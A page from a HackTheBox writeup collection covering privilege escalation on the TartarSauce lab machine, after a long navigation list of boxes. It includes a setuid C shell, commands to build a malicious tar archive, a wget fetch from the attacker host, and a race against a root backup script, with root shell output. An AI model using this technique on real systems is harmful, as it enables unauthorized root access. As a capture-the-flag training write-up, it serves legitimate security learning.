🔐
HackTheBox Writeups
  • kashz HTB Writeups
  • HTB BOXES
    • ACCESS
      • 5 admin
      • 4 user
      • 3 telnet
      • 2 http
      • 1 recon
    • ADMIRER
      • 5 root
      • 4 adminer-php
      • 3 ftp
      • 2 http
      • 1 recon
    • ARCHETYPE
      • 3 :1433 mssql
      • 2 :139 :445 smb
      • 1 recon
    • ARMAGEDDON
      • 8 privesc dirty_sockv2
      • 7 privesc
      • 6 box enum bruce
      • 5 :80 drupalgeddon2
      • 4 :80 droopescan
      • 3 :80
      • 2 :80 robots.txt
      • 1 recon
    • ATOM
      • 4 privesc
      • 3 box enum jason
      • 2 :139 :445 smb
      • 1 recon
    • BANK
      • 5 privesc
      • 4 box enum
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • BANKROBBER
      • 6 privesc brute force PIN > BOF
      • 5 privesc bankv2.exe
      • 4 box enum cortin
      • 3 admin backdoorchecker.php
      • 2 :80 :443 XSS > admin
      • 1 recon
    • BASHED
      • 2 :80
      • 1 recon
    • BASTARD
      • 6 privesc_2 ms10-059
      • 5 privesc_1 ms15-051
      • 4 box enum KE
      • 3 :80 drupalgeddon2
      • 2 :80 drupal7
      • 1 recon
    • BASTION
      • 3 box enum > privesc
      • 2 :139 :445 smb
      • 1 recon
    • BEEP
      • 7 :80 elastix 2.2.0 RCE + privesc
      • 6 :10000 webmin
      • 5 :25 smtp
      • 4 :80 vtigercrm
      • 3 :80 admin
      • 2 :80
      • 1 recon
    • BLOCKY
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • BLUE
      • 3 ms17-010
      • 2 :139 :445 smb
      • 1 recon
    • BLUNDER
      • 5 www-data > hugo > root
      • 4 box enum
      • 3 bludit 3.9.2 file_upload RCE
      • 2 :80
      • 1 recon
    • BOUNTY
      • 4 JuicyPotato
      • 3 privesc check
      • 2 :80
      • 1 recon
    • BOUNTYHUNTER
      • 4 privesc
      • 3 :22 ssh development
      • 2 :80 xxe
      • 1 recon
    • BRAINFUCK
      • 5 privesc
      • 5 :443 sup3rs3cr3t.brainfuck.htb
      • 4 :143 imap
      • 3 :443 wpscan
      • 2 :443
      • 1 recon
    • BRAINPAN1
      • 4 privesc
      • 3 BOF
      • 2 :10000
      • 1 recon
    • BUCKET
      • 6 privesc
      • 5 dynamodb roy
      • 4 box enum www-data
      • 3 :80 s3.bucket.htb
      • 2 :80 bucket.htb
      • 1 recon
    • BUFF
      • 4 privesc
      • 3 :80
      • 2 :8080
      • 1 recon
    • CAP
      • 4 privesc
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • CHATTERBOX
      • 5 privesc autologon creds
      • 4 privesc w/ grant perm
      • 3 box enum
      • 2 :9256 achat chat system
      • 1 recon
    • CONCEAL
      • 9 privesc
      • 8 :80
      • 7 :21 ftp
      • 6 post vpn recon
      • 5 ipsec conn config
      • 4 ipsec summary
      • 3 :500/udp ipsec
      • 2 :161/udp snmp
      • 1 recon
    • CRONOS
      • 6 post enum
      • 5 privesc cronjob
      • 4 box enum
      • 3 :53 dns
      • 2 :80
      • 1 recon
    • DELIVERY
      • 4 :3306 mysql > privesc
      • 3 :8065 mattermost
      • 2 :80
      • 1 recon
    • DEVEL
      • 4 privesc_2 ms11-046
      • 3 privesc_1 JuicyPotato
      • 2 :21 ftp
      • 1 recon
    • DOCTOR
      • 7 post enum
      • 6 :8089 privesc splunk > root
      • 5 web > shaun
      • 4 box enum web
      • 3 :80 SSTI
      • 2 :80 splunkd
      • 1 recon
    • DYNSTR
      • 6 privesc
      • 5 box enum > bindmgr
      • 4 nsupdate exploit
      • 3 :80
      • 2 :53 dns
      • 1 recon
    • EXPLORE
      • 3 :2222 ssh kristi > root
      • 2 :59777 es file explorer
      • 1 recon
    • FRIENDZONE
      • 7 privesc
      • 6 administrator1.friendzone.red
      • 5 dns
      • 4 smb
      • 3 :443
      • 2 :80
      • 1 recon
    • FUSE
      • 7 privesc SeLoadDriverPrivilege
      • 6 rpc
      • 5 spray passwd
      • 4 :389 ldap
      • 3 :80 PaperCut Logger
      • 2 :139 :445 smb
      • 1 recon
    • GRANDPA
      • 4 privesc
      • 3 webdav exploit
      • 2 :80
      • 1 recon
    • GRANNY
      • 4 privesc
      • 3 :80 webdav exploit
      • 2 :80
      • 1 recon
    • HAIRCUT
      • 5 post enum
      • 4 privesc www-data > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • IRKED
      • 4 box enum
      • 3 :6697 irc
      • 2 :80
      • 1 recon
    • JARVIS
      • 9 post enum
      • 8 pepper > root
      • 7 www-data > pepper
      • 6 box enum www-data
      • 5 phpMyAdmin 4.8 LFI
      • 4 :80 sqli
      • 3 :64999
      • 2 :80
      • 1 recon
    • JEEVES
      • 2 :50000
      • 1 recon
    • JERRY
      • 4 manual
      • 3 tomcatWarDeployer
      • 2 :8080 tomcat
      • 1 recon
    • KNIFE
      • 3 privesc
      • 2 :80 php 8.1.0 dev
      • 1 recon
    • LABORATORY
      • 6 privesc
      • 5 gitlab admin dexter
      • 4 stable shell
      • 3 :443 gitlab shell
      • 2 :443 gitlab
      • 1 recon
    • LACASADEPAPEL
      • 4 box enum > privesc
      • 3 :80 > :443
      • 2 :21 ftp
      • 1 recon
    • LAME
      • 4 :139 :445 smb exploit
      • 3 :3632 distccd
      • 2 :139 :445 smb
      • 1 recon
    • LEGACY
      • 4 MS-17-010
      • 3 MS08-067
      • 2 :139 :445 smb
      • 1 recon
    • LOVE
      • 3 privesc
      • 2 :80
      • 1 recon
    • MAGIC
      • 5 post enum
      • 4 privesc theseus > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • MANGO
      • 6 post enum
      • 5 privesc admin > root
      • 4 mango > admin
      • 3 box enum mango
      • 2 :80 :443
      • 1 recon
    • MIRAI
      • 3 :22 ssh
      • 2 :80
      • 1 recon
    • MONITORS
      • 12 post enum
      • 11 docker breakout > root
      • 10 Apache Tomcat/9.0.31 deserialization RCE > docker root
      • 9 box enum marcus
      • 8 manual enum www-data
      • 7 :8443
      • 6 box enum www-data
      • 5 cacti-admin.monitors.htb
      • 4 wp with spritz exploit
      • 3 :80 wpscan
      • 2 :80
      • 1 recon
    • NETWORKED
      • 7 post enum
      • 6 box enum guly > privesc > root
      • 5 check_attack.php
      • 4 box enum
      • 3 :80 upload.php & lib.php
      • 2 :80
      • 1 recon
    • NIBBLES
      • 4 privesc
      • 3 fileUpload exploit
      • 2 :80
      • 1 recon
    • NINEVEH
      • 6 post enum
      • 5 privesc amrois > root
      • 4 box enum www-data > amrois
      • 3 :443
      • 2 :80
      • 1 recon
    • NODE
      • 7 post enum
      • 6 privesc tom > root
      • 5 mark > tom
      • 4 box enum mark
      • 3 :3000 login
      • 2 :3000
      • 1 recon
    • OMNI
      • 5 cracking user.txt | root.txt
      • 4 dump SAM SYSTEM
      • 3 box enum ?
      • 2 :8080
      • 1 recon
    • OOPSIE
      • 4 post enum
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • OPENADMIN
      • 6 joanna > root
      • 5 jimmy > joanna
      • 4 manual enum > jimmy
      • 3 openNetAdmin 18.1.1
      • 2 :80
      • 1 recon
    • OPHIUCHI
      • 4 privesc
      • 3 yaml deserialization exploit
      • 2 :8080
      • 1 recon
    • OPTIMUM
      • 3 box enum > privesc
      • 2 :80
      • 1 recon
    • PASSAGE
      • 7 post enum
      • 6 privesc dbus com.ubuntu.USBCreator.conf
      • 5 box enum nadav
      • 4 box enum paul
      • 3 box enum www-data
      • 2 :80 cutenews
      • 1 recon
    • POISON
      • 6 foothold_3 log poisoning
      • 5 foothold_2 phpinfo.php + LFI
      • 4 privesc vncviewer > root
      • 3 box enum charix
      • 2 :80
      • 1 recon
    • POPCORN
      • 7 post enum
      • 6 privesc_2 rds
      • 5 privesc_1 full-nelson
      • 4 manual privesc > root
      • 3 box enum www-data
      • 2 :80
      • 1 recon
    • POSTMAN
      • 6 webmin (matt > root)
      • 5 Matt > root
      • 4 redis > Matt
      • 3 :6379 redis
      • 2 :80
      • 1 recon
    • QUERIER
      • 6 privesc GPP CachedPassword
      • 5 privesc
      • 4 mssql using msf
      • 3 mssql
      • 2 smb
      • 1 recon
    • READY
      • 4 PEAS > docker > escape > root
      • 3 :5080 gitlab
      • 2 :5080 robots.txt
      • 1 recon
    • REMOTE
      • 8 privesc teamviewer
      • 7 privesc UsoSvc
      • 6 privesc
      • 5 RCE
      • 4 :111 rpc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • SCRIPTKIDDIE
      • 2 :5000
      • 1 recon
    • SECNOTES
      • 9 privesc_3 bash.exe
      • 8 privesc_2 UsoSvc
      • 7 privesc_1 PrintSpoofer
      • 6 box enum iis apppool
      • 5 :445 smb
      • 4 :80 CSRF
      • 3 :8808 IIS
      • 2 :80 IIS
      • 1 recon
    • SENSE
      • 2 :80 pfsense
      • 1 recon
    • SERVMON
      • 5 privesc
      • 4 box enum nadine
      • 3 :80 NVMS
      • 2 :21 ftp
      • 1 recon
    • SHIELD
      • 3 privesc
      • 2 :80
      • 1 recon
    • SHOCKER
      • 2 :80 shellshock
      • 1 recon
    • SILO
      • 6 odat shell
      • 5 sqlplus
      • 4 :1521 orcale tns listener
      • 3 :8080 XDB
      • 2 :80
      • 1 recon
    • SNEAKYMAILER
      • 11 post enum
      • 10 privesc low > root
      • 9 localhost:5000 > low
      • 8 box enum developer
      • 7 box enum www-data
      • 6 :21 ftp
      • 5 :143 imap
      • 4 :25 smtp
      • 3 :8080
      • 2 :80
      • 1 recon
    • SNIPER
      • 8 box enum chris + privesc
      • 7 iusr > chris
      • 6 privesc_1 PrintSpoofer
      • 5 box enum nt authority\iusr
      • 4 :80 /blog > LFI > smbRFI
      • 3 :80 /user
      • 2 :80
      • 1 recon
    • SOLIDSTATE
      • 7 privesc
      • 6 :22 ssh mindy
      • 5 :110 pop3
      • 4 apache james 2.3.2 RCE
      • 3 :4555 JAMES RAT 2.3.2
      • 2 :80
      • 1 recon
    • SPECTRA
      • 4 nginx shell > katie
      • 3 wordpress
      • 2 :80
      • 1 recon
    • SPIDER
      • 8 post enum
      • 7 localhost:8080 XXE
      • 6 box enum chiv manual
      • 5 box enum chiv
      • 4 :80 chiv login + SSTI
      • 3 :80 sqlmap via flask cookie
      • 2 :80 SSTI via /register to /user
      • 1 recon
    • SWAGSHOP
      • 3 privesc
      • 2 :80
      • 1 recon
    • TABBY
      • 5 tomcat > ash > root
      • 4 box enum
      • 3 :8080 tomcat9
      • 2 :80
      • 1 recon
    • TARTARSAUCE
      • 10 post enum
      • 9 privesc omuna > root
      • 8 box enum onuma
      • 7 www-data > onuma
      • 6 box enum www-data
      • 5 :80 monstra
      • 4 :80 wpscan
      • 3 :80 monstra
      • 2 :80
      • 1 recon
    • TENET
      • 4 privesc
      • 3 php file injection (deserialization exploit)
      • 2 :80 wordpress
      • 1 recon
    • THENOTEBOOK
      • 5 privesc docker runC exploit
      • 4 shell
      • 3 :80 JWT exploitation
      • 2 :80
      • 1 recon
    • TRAVEREXEC
      • 5 david > root
      • 4 www-data > david
      • 3 box enum
      • 2 :80 nostromo 1.9.6
      • 1 recon
    • VACCINE
      • 4 privesc
      • 3 :80
      • 2 :21 ftp
      • 1 recon
    • VALENTINE
      • 6 privesc dirtyc0w
      • 5 privesc tmux
      • 4 box enum
      • 3 heartbleed
      • 2 :80
      • 1 recon
    • WORKER
      • 11 evil-winrim robisl :5985
      • 10 box manual enum
      • 9 box enum iis apppool\defaultapppool
      • 8 privesc PrintSoofer FAIL
      • 7 :80 spectral.worker.htb shell
      • 6 :80 devops.worker.htb
      • 5 explore domains
      • 4 :80 dimension.worker.htb
      • 3 :3690 subversion
      • 2 :80 IIS 10.0
      • 1 recon
Powered by GitBook
On this page
  1. HTB BOXES
  2. TARTARSAUCE

9 privesc omuna > root

# pspy shows
2021/09/22 17:09:31 CMD: UID=0    PID=5730   | /bin/bash /usr/sbin/backuperer

# looking at the script 
We can see that the script does – more or less – the following:
1. Removes dot files from /var/tmp, plus the /var/tmp/check folder.
2. Zips/archives the contents of /var/www/html as user onuma into a file in /var/tmp with a random name beginning with a dot.
3. Sleeps for 30 seconds
4. Creates the directory /var/tmp/check
5. Extracts the previously archived contents as root into the /var/tmp/check directory
6. Performs a diff against /var/www/html vs. /var/tmp/check/var/www/html
7. If the check in 6. reports differences, it just writes an error log, but leaves the files. If no differences are reported or if the diff command errors out (as, for example, the directory doesn’t exit), it moves the archive file into /var/backups and then removes the /var/tmp/check directory and dot file

If we are able to replace the tar gzipped file with our own malicious one in the timeframe of step 3 (sleep 30), include in our own tar.gz an executable with setuid bit set and owner root, plus leave the directory structure intact (as we want a successful diff (no error) that reports differences), tar should extract (and keep permissions/attributes) and the script should not move/delete any file. After that we could then enter the check directory and execute our file to get a root shell.

# exploit.c
#include <unistd.h>
int main()
{
    setuid(0);
    execl("/bin/bash", "bash", (char *)NULL);
    return 0;
}

$ gcc -m32 exploit.c -o exploit

# needs to be owned by root as target will think the file is owned by root
$ sudo chown root:root exploit
$ sudo chmod +s exploit

# make the dir structure
$ mkdir -p var/www/html
$ mv exploit var/www/html
$ tar -zcvf exploit.tar.gz var
var/
var/www/
var/www/html/
var/www/html/exploit

# donwload file where the .<random> file is created
onuma@TartarSauce:/var/tmp$ wget 10.10.16.5/exploit.tar.gz

onuma@TartarSauce:/var/tmp$ ll
total 2216
drwxrwxrwt 10 root  root     4096 Sep 22 17:44 ./
drwxr-xr-x 14 root  root     4096 Feb  9  2018 ../
-rw-r--r--  1 onuma onuma 2224128 Sep 22 17:44 .90e7643302fce3d4b68759541125b78fa0785a29
-rw-r--r--  1 onuma onuma    2640 Sep 22 17:39 exploit.tar.gz

# change exploit to .<file>
onuma@TartarSauce:/var/tmp$ mv exploit.tar.gz .90e7643302fce3d4b68759541125b78fa0

# wait until we see the check folder
onuma@TartarSauce:/var/tmp$ ll
total 48
drwxrwxrwt 11 root  root  4096 Sep 22 17:44 ./
drwxr-xr-x 14 root  root  4096 Feb  9  2018 ../
-rw-r--r--  1 onuma onuma 2640 Sep 22 17:39 .90e7643302fce3d4b68759541125b78fa0785a29
drwxr-xr-x  3 root  root  4096 Sep 22 17:44 check/

# in the check/var/www/html/, we have our exploit with setuid bit
onuma@TartarSauce:/var/tmp/check/var/www/html$ ls -la
total 24
drwxr-xr-x 2 onuma onuma  4096 Sep 22 17:38 .
drwxr-xr-x 3 onuma onuma  4096 Sep 22 17:38 ..
-rwsr-xr-x 1 root  root  15100 Sep 22 17:36 exploit

onuma@TartarSauce:/var/tmp/check/var/www/html$ ./exploit
root@TartarSauce:/var/tmp/check/var/www/html# whoami;id;hostname
root
uid=0(root) gid=1000(onuma) groups=1000(onuma),24(cdrom),30(dip),46(plugdev)
TartarSauce
Previous10 post enumNext8 box enum onuma

Last updated 3 years ago